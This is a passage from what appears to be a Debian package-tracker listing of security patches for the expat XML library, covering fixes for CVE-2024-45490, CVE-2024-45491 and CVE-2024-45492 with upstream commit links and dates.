Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/5c1a31642e243f4870c0bd1f2afc7597976521bf 2024-08-19
CVE-2024-45490/02-c12f039.patch tests: Cover "len < 0" for both XML_Parse and XML_ParseBuffer Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/c12f039b8024d6b9a11c20858370495ff6ff5245 2024-08-20
CVE-2024-45490/03-2db2330.patch doc: Document that XML_Parse/XML_ParseBuffer reject "len < 0" Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/2db233019f551fe4c701bbbc5eb0fa58ff349daa 2024-08-25
CVE-2024-45491.patch lib: Detect integer overflow in dtdCopy
Reported by TaiYou
Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/8e439a9947e9dc80a395c0c7456545d8d9d9e421 2024-08-19
CVE-2024-45492.patch lib: Detect integer overflow in function nextScaffoldPart
Reported by TaiYou
Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/9bf0f2c16ee86f644dd1432507edff94c08dc232 2024-08-19

All known versions for source package 'expat'

Links